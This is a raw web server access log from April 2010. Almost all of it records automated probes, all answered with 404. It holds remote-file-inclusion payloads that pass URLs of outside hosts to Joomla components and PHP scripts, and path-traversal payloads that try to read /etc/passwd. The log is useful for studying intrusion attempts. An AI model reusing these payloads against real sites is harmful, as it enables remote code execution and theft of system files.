88.191.94.188 - - [19/Apr/2010:12:43:00 -0500] "GET /logs/access_log.1268956800//Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
88.191.94.188 - - [19/Apr/2010:12:43:12 -0500] "GET /logs/access_log.1268956800//Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
88.191.94.188 - - [19/Apr/2010:12:43:12 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
88.191.94.188 - - [19/Apr/2010:12:43:12 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
87.250.255.243 - - [19/Apr/2010:12:43:58 -0500] "GET /logs/access_log.1265673600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
118.217.216.132 - - [19/Apr/2010:12:44:00 -0500] "GET /logs/access_log.1219708800%20%20//citywriter/head.php?path=http://www.kumcalb.org/g4//bbs/calendar/id1.txt?????????????? HTTP/1.1" 404 333 "-""Mozilla/5.0"
118.217.216.132 - - [19/Apr/2010:12:44:00 -0500] "GET //citywriter/head.php?path=http://www.kumcalb.org/g4//bbs/calendar/id1.txt?????????????? HTTP/1.1" 404 304 "-""Mozilla/5.0"
118.217.216.132 - - [19/Apr/2010:12:44:00 -0500] "GET /logs//citywriter/head.php?path=http://www.kumcalb.org/g4//bbs/calendar/id1.txt?????????????? HTTP/1.1" 404 309 "-""Mozilla/5.0"
89.190.193.196 - - [19/Apr/2010:12:44:07 -0500] "GET /index.php?visualizar=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""-"
89.190.193.196 - - [19/Apr/2010:12:44:07 -0500] "GET /logs/index.php?visualizar=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""-"
89.190.193.196 - - [19/Apr/2010:12:44:08 -0500] "GET /logs/index.php?visualizar=./../../../../../../../../etc/passwd HTTP/1.1" 404 298 "-""-"
89.190.193.196 - - [19/Apr/2010:12:44:09 -0500] "GET /index.php?visualizar=./../../../../../../../../etc/passwd HTTP/1.1" 404 293 "-""-"
118.217.216.132 - - [19/Apr/2010:12:44:13 -0500] "GET //citywriter/head.php?path=http://www.kumcalb.org/g4//bbs/calendar/id1.txt?????????????? HTTP/1.1" 404 304 "-""Mozilla/5.0"
118.217.216.132 - - [19/Apr/2010:12:44:14 -0500] "GET /logs/access_log.1219708800%20%20//citywriter/head.php?path=http://www.kumcalb.org/g4//bbs/calendar/id1.txt?????????????? HTTP/1.1" 404 333 "-""Mozilla/5.0"
118.217.216.132 - - [19/Apr/2010:12:44:14 -0500] "GET /logs//citywriter/head.php?path=http://www.kumcalb.org/g4//bbs/calendar/id1.txt?????????????? HTTP/1.1" 404 309 "-""Mozilla/5.0"
208.80.193.27 - - [19/Apr/2010:12:44:28 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; FunWebProducts; .NET CLR 1.1.4322; Hotbar 10.0.342.0)"
174.136.50.39 - - [19/Apr/2010:12:45:47 -0500] "GET /logs/access_log.1270684800///administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 379 "-""Mozilla/5.0"
174.136.50.39 - - [19/Apr/2010:12:45:47 -0500] "GET ///administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.136.50.39 - - [19/Apr/2010:12:45:47 -0500] "GET /logs///administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 357 "-""Mozilla/5.0"
174.136.50.39 - - [19/Apr/2010:12:46:04 -0500] "GET /logs///administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 357 "-""Mozilla/5.0"
174.136.50.39 - - [19/Apr/2010:12:46:04 -0500] "GET ///administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.136.50.39 - - [19/Apr/2010:12:46:04 -0500] "GET /logs/access_log.1270684800///administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 379 "-""Mozilla/5.0"
205.209.53.68 - - [19/Apr/2010:12:46:23 -0500] "GET /logs/index.php?do=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""-"
205.209.53.68 - - [19/Apr/2010:12:46:23 -0500] "GET /index.php?do=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""-"
205.209.53.68 - - [19/Apr/2010:12:46:23 -0500] "GET /logs/access_log.1231718400%20/index.php?do=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""-"
205.209.53.68 - - [19/Apr/2010:12:46:23 -0500] "GET /logs/index.php?do=./../../../../../../../../etc/passwd HTTP/1.1" 404 298 "-""-"
205.209.53.68 - - [19/Apr/2010:12:46:24 -0500] "GET /logs/access_log.1231718400%20/index.php?do=./../../../../../../../../etc/passwd HTTP/1.1" 404 321 "-""-"
205.209.53.68 - - [19/Apr/2010:12:46:24 -0500] "GET /index.php?do=./../../../../../../../../etc/passwd HTTP/1.1" 404 293 "-""-"
216.38.53.135 - - [19/Apr/2010:12:47:03 -0500] "GET /index_principal.php?pagina=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 303 "-""-"
216.38.53.135 - - [19/Apr/2010:12:47:03 -0500] "GET /logs/index_principal.php?pagina=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 308 "-""-"
216.38.53.135 - - [19/Apr/2010:12:47:03 -0500] "GET /index_principal.php?pagina=./../../../../../../../../etc/passwd HTTP/1.1" 404 303 "-""-"
216.38.53.135 - - [19/Apr/2010:12:47:03 -0500] "GET /logs/index_principal.php?pagina=./../../../../../../../../etc/passwd HTTP/1.1" 404 308 "-""-"
207.46.199.177 - - [19/Apr/2010:12:48:14 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.216.43.133 - - [19/Apr/2010:12:48:22 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
209.216.43.133 - - [19/Apr/2010:12:48:22 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
209.216.43.133 - - [19/Apr/2010:12:48:22 -0500] "GET /logs/access_log.1212969600%20%20//newspublish/include.php?path%5Bdocroot%5D=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
218.240.43.121 - - [19/Apr/2010:12:48:28 -0500] "GET /index.php?dept=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""-"
209.216.43.133 - - [19/Apr/2010:12:48:28 -0500] "GET /logs/access_log.1212969600%20%20//newspublish/include.php?path%5Bdocroot%5D=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
209.216.43.133 - - [19/Apr/2010:12:48:28 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
209.216.43.133 - - [19/Apr/2010:12:48:28 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
218.240.43.121 - - [19/Apr/2010:12:48:29 -0500] "GET /index.php?dept=./../../../../../../../../etc/passwd HTTP/1.1" 404 293 "-""-"
67.218.116.132 - - [19/Apr/2010:12:49:23 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
174.136.1.9 - - [19/Apr/2010:12:49:49 -0500] "GET /logs/home.php?action=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""-"
174.136.1.9 - - [19/Apr/2010:12:49:49 -0500] "GET /logs/access_log.1224028800%20/home.php?action=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""-"
174.136.1.9 - - [19/Apr/2010:12:49:49 -0500] "GET /home.php?action=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""-"
174.136.1.9 - - [19/Apr/2010:12:49:49 -0500] "GET /home.php?action=./../../../../../../../../etc/passwd HTTP/1.1" 404 292 "-""-"
174.136.1.9 - - [19/Apr/2010:12:49:49 -0500] "GET /logs/access_log.1224028800%20/home.php?action=./../../../../../../../../etc/passwd HTTP/1.1" 404 320 "-""-"
174.136.1.9 - - [19/Apr/2010:12:49:49 -0500] "GET /logs/home.php?action=./../../../../../../../../etc/passwd HTTP/1.1" 404 297 "-""-"
69.64.51.27 - - [19/Apr/2010:12:50:07 -0500] "GET /home.php?pagina=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""-"
69.64.51.27 - - [19/Apr/2010:12:50:07 -0500] "GET /home.php?pagina=./../../../../../../../../etc/passwd HTTP/1.1" 404 292 "-""-"
87.250.255.243 - - [19/Apr/2010:12:50:18 -0500] "GET /logs/access_log.1266624000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
174.136.50.39 - - [19/Apr/2010:12:50:23 -0500] "GET /logs/access_log.1235779200///administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 379 "-""Mozilla/5.0"
207.210.228.131 - - [19/Apr/2010:12:52:17 -0500] "GET /logs/index2.php?x=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""-"
207.210.228.131 - - [19/Apr/2010:12:52:17 -0500] "GET /logs/index2.php?x=./../../../../../../../../etc/passwd HTTP/1.1" 404 299 "-""-"
207.210.228.131 - - [19/Apr/2010:12:52:17 -0500] "GET /index2.php?x=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""-"
207.210.228.131 - - [19/Apr/2010:12:52:17 -0500] "GET /index2.php?x=./../../../../../../../../etc/passwd HTTP/1.1" 404 294 "-""-"
89.185.253.148 - - [19/Apr/2010:12:54:43 -0500] "GET /main.php?pagina=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""-"
89.185.253.148 - - [19/Apr/2010:12:54:43 -0500] "GET /logs/main.php?pagina=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""-"
89.185.253.148 - - [19/Apr/2010:12:54:44 -0500] "GET /main.php?pagina=./../../../../../../../../etc/passwd HTTP/1.1" 404 292 "-""-"
89.185.253.148 - - [19/Apr/2010:12:54:44 -0500] "GET /logs/main.php?pagina=./../../../../../../../../etc/passwd HTTP/1.1" 404 297 "-""-"
205.188.117.8 - - [19/Apr/2010:12:55:22 -0500] "HEAD /tattoo/tattoo-order.htm HTTP/1.1" 200 0 "-""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.185; Windows NT 5.1; Trident/4.0; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
87.250.255.243 - - [19/Apr/2010:12:56:13 -0500] "GET /logs/access_log.1265846400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
69.64.51.27 - - [19/Apr/2010:12:59:00 -0500] "GET /index.php?langc=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""-"
69.64.51.27 - - [19/Apr/2010:12:59:00 -0500] "GET /index.php?langc=./../../../../../../../../etc/passwd HTTP/1.1" 404 293 "-""-"
69.64.51.27 - - [19/Apr/2010:12:59:01 -0500] "GET /logs/index.php?langc=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""-"
69.64.51.27 - - [19/Apr/2010:12:59:01 -0500] "GET /logs/index.php?langc=./../../../../../../../../etc/passwd HTTP/1.1" 404 298 "-""-"
81.177.13.130 - - [19/Apr/2010:12:59:30 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.kumcalb.org/g4//bbs/calendar/id1.txt???????????? HTTP/1.1" 404 333 "-""Mozilla/5.0"
81.177.13.130 - - [19/Apr/2010:12:59:30 -0500] "GET /logs/access_log.1219363200//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.kumcalb.org/g4//bbs/calendar/id1.txt???????????? HTTP/1.1" 404 355 "-""Mozilla/5.0"
81.177.13.130 - - [19/Apr/2010:12:59:30 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.kumcalb.org/g4//bbs/calendar/id1.txt???????????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
87.250.255.243 - - [19/Apr/2010:13:00:23 -0500] "GET /logs/access_log.1263945600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
118.217.216.132 - - [19/Apr/2010:13:03:40 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.kumcalb.org/g4//bbs/calendar/id1.txt?????????????? HTTP/1.1" 404 330 "-""Mozilla/5.0"
118.217.216.132 - - [19/Apr/2010:13:03:40 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.kumcalb.org/g4//bbs/calendar/id1.txt?????????????? HTTP/1.1" 404 325 "-""Mozilla/5.0"
118.217.216.132 - - [19/Apr/2010:13:03:40 -0500] "GET /logs/access_log.1219708800%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.kumcalb.org/g4//bbs/calendar/id1.txt?????????????? HTTP/1.1" 404 354 "-""Mozilla/5.0"
118.217.216.132 - - [19/Apr/2010:13:03:46 -0500] "GET /logs/access_log.1220054400%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.kumcalb.org/g4//bbs/calendar/id1.txt?????????????? HTTP/1.1" 404 354 "-""Mozilla/5.0"
118.217.216.132 - - [19/Apr/2010:13:04:15 -0500] "GET /logs/access_log.1220054400//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.kumcalb.org/g4//bbs/calendar/id1.txt?????????????? HTTP/1.1" 404 352 "-""Mozilla/5.0"
118.217.216.132 - - [19/Apr/2010:13:04:15 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.kumcalb.org/g4//bbs/calendar/id1.txt?????????????? HTTP/1.1" 404 325 "-""Mozilla/5.0"
118.217.216.132 - - [19/Apr/2010:13:04:15 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.kumcalb.org/g4//bbs/calendar/id1.txt?????????????? HTTP/1.1" 404 330 "-""Mozilla/5.0"
118.217.216.132 - - [19/Apr/2010:13:04:18 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.kumcalb.org/g4//bbs/calendar/id1.txt?????????????? HTTP/1.1" 404 325 "-""Mozilla/5.0"
118.217.216.132 - - [19/Apr/2010:13:04:18 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.kumcalb.org/g4//bbs/calendar/id1.txt?????????????? HTTP/1.1" 404 330 "-""Mozilla/5.0"
118.217.216.132 - - [19/Apr/2010:13:04:18 -0500] "GET /logs/access_log.1220054400//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.kumcalb.org/g4//bbs/calendar/id1.txt?????????????? HTTP/1.1" 404 352 "-""Mozilla/5.0"
87.250.255.243 - - [19/Apr/2010:13:05:28 -0500] "GET /logs/access_log.1267574400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
212.227.141.53 - - [19/Apr/2010:13:05:45 -0500] "GET /logs/access_log.1268265600%20%20/joomla/index.php?option=com_restaurante&task=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
212.227.141.53 - - [19/Apr/2010:13:05:45 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
212.227.141.53 - - [19/Apr/2010:13:05:45 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
212.227.141.53 - - [19/Apr/2010:13:05:46 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
212.227.141.53 - - [19/Apr/2010:13:05:46 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
212.227.141.53 - - [19/Apr/2010:13:05:46 -0500] "GET /logs/access_log.1268265600%20%20/joomla/index.php?option=com_restaurante&task=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
212.227.141.53 - - [19/Apr/2010:13:06:08 -0500] "GET /logs/access_log.1268265600/joomla/index.php?option=com_restaurante&task=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
212.227.141.53 - - [19/Apr/2010:13:06:08 -0500] "GET /logs/access_log.1268265600/joomla/index.php?option=com_restaurante&task=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
212.227.141.53 - - [19/Apr/2010:13:06:18 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
212.227.141.53 - - [19/Apr/2010:13:06:18 -0500] "GET /logs/access_log.1268265600%20%20/joomla/index.php?option=com_restaurante&task=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
212.227.141.53 - - [19/Apr/2010:13:06:18 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
212.227.141.53 - - [19/Apr/2010:13:06:19 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
212.227.141.53 - - [19/Apr/2010:13:06:19 -0500] "GET /logs/access_log.1268265600%20%20/joomla/index.php?option=com_restaurante&task=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
212.227.141.53 - - [19/Apr/2010:13:06:19 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
212.227.141.53 - - [19/Apr/2010:13:06:37 -0500] "GET /logs/access_log.1268265600/joomla/index.php?option=com_restaurante&task=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
174.136.50.39 - - [19/Apr/2010:13:06:38 -0500] "GET ///index.php?option=com_lmo&mosConfig.absolute.path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 295 "-""Mozilla/5.0"
174.136.50.39 - - [19/Apr/2010:13:06:38 -0500] "GET /logs/access_log.1267920000///index.php?option=com_lmo&mosConfig.absolute.path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
174.136.50.39 - - [19/Apr/2010:13:06:38 -0500] "GET /logs///index.php?option=com_lmo&mosConfig.absolute.path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
174.136.50.39 - - [19/Apr/2010:13:06:45 -0500] "GET ///index.php?option=com_lmo&mosConfig.absolute.path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 295 "-""Mozilla/5.0"
174.136.50.39 - - [19/Apr/2010:13:06:45 -0500] "GET /logs///index.php?option=com_lmo&mosConfig.absolute.path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
174.136.50.39 - - [19/Apr/2010:13:06:45 -0500] "GET /logs/access_log.1268870400///index.php?option=com_lmo&mosConfig.absolute.path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
209.216.43.133 - - [19/Apr/2010:13:06:47 -0500] "GET /logs/access_log.1219708800%20%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://kumcalb.org///g4/adm/img/id1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
209.216.43.133 - - [19/Apr/2010:13:06:47 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://kumcalb.org///g4/adm/img/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
209.216.43.133 - - [19/Apr/2010:13:06:47 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://kumcalb.org///g4/adm/img/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.136.50.39 - - [19/Apr/2010:13:06:51 -0500] "GET /logs///index.php?option=com_lmo&mosConfig.absolute.path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
174.136.50.39 - - [19/Apr/2010:13:06:51 -0500] "GET /logs/access_log.1267920000%20%20///index.php?option=com_lmo&mosConfig.absolute.path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
174.136.50.39 - - [19/Apr/2010:13:06:51 -0500] "GET ///index.php?option=com_lmo&mosConfig.absolute.path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 295 "-""Mozilla/5.0"
174.136.50.39 - - [19/Apr/2010:13:06:55 -0500] "GET ///index.php?option=com_lmo&mosConfig.absolute.path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 295 "-""Mozilla/5.0"
174.136.50.39 - - [19/Apr/2010:13:06:55 -0500] "GET /logs/access_log.1267920000%20%20///index.php?option=com_lmo&mosConfig.absolute.path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
174.136.50.39 - - [19/Apr/2010:13:06:55 -0500] "GET /logs///index.php?option=com_lmo&mosConfig.absolute.path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
212.227.141.53 - - [19/Apr/2010:13:07:04 -0500] "GET /logs/access_log.1268265600/joomla/index.php?option=com_restaurante&task=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
212.227.141.53 - - [19/Apr/2010:13:07:12 -0500] "GET /logs/access_log.1266105600/joomla/index.php?option=com_restaurante&task=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
212.227.141.53 - - [19/Apr/2010:13:07:12 -0500] "GET /logs/access_log.1213401600/joomla/index.php?option=com_restaurante&task=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
212.227.141.53 - - [19/Apr/2010:13:07:13 -0500] "GET /logs/access_log.1266105600/joomla/index.php?option=com_restaurante&task=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
212.227.141.53 - - [19/Apr/2010:13:07:13 -0500] "GET /logs/access_log.1213401600/joomla/index.php?option=com_restaurante&task=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
212.227.141.53 - - [19/Apr/2010:13:07:20 -0500] "GET /logs/access_log.1266105600/joomla/index.php?option=com_restaurante&task=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
212.227.141.53 - - [19/Apr/2010:13:07:20 -0500] "GET /logs/access_log.1213401600/joomla/index.php?option=com_restaurante&task=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
174.136.50.39 - - [19/Apr/2010:13:07:32 -0500] "GET ///index.php?option=com_lmo&mosConfig.absolute.path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 295 "-""Mozilla/5.0"
174.136.50.39 - - [19/Apr/2010:13:07:32 -0500] "GET /logs///index.php?option=com_lmo&mosConfig.absolute.path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
174.136.50.39 - - [19/Apr/2010:13:07:32 -0500] "GET /logs/access_log.1267920000///index.php?option=com_lmo&mosConfig.absolute.path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
174.136.50.39 - - [19/Apr/2010:13:07:33 -0500] "GET /logs/access_log.1267920000///index.php?option=com_lmo&mosConfig.absolute.path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
174.136.50.39 - - [19/Apr/2010:13:07:33 -0500] "GET /logs///index.php?option=com_lmo&mosConfig.absolute.path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
174.136.50.39 - - [19/Apr/2010:13:07:33 -0500] "GET ///index.php?option=com_lmo&mosConfig.absolute.path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 295 "-""Mozilla/5.0"
212.227.141.53 - - [19/Apr/2010:13:08:01 -0500] "GET /logs/access_log.1266105600/joomla/index.php?option=com_restaurante&task=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
212.227.141.53 - - [19/Apr/2010:13:08:01 -0500] "GET /logs/access_log.1213401600/joomla/index.php?option=com_restaurante&task=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
212.227.141.53 - - [19/Apr/2010:13:08:09 -0500] "GET /logs/access_log.1219708800/joomla/index.php?option=com_restaurante&task=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
212.227.141.53 - - [19/Apr/2010:13:08:26 -0500] "GET /logs/access_log.1219708800/joomla/index.php?option=com_restaurante&task=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
212.227.141.53 - - [19/Apr/2010:13:08:36 -0500] "GET /logs/access_log.1219708800/joomla/index.php?option=com_restaurante&task=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
212.227.141.53 - - [19/Apr/2010:13:08:53 -0500] "GET /logs/access_log.1219708800/joomla/index.php?option=com_restaurante&task=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
87.250.255.243 - - [19/Apr/2010:13:12:26 -0500] "GET /logs/access_log.1262563200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
174.136.1.9 - - [19/Apr/2010:13:12:41 -0500] "GET /logs/folder.php?id=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""-"
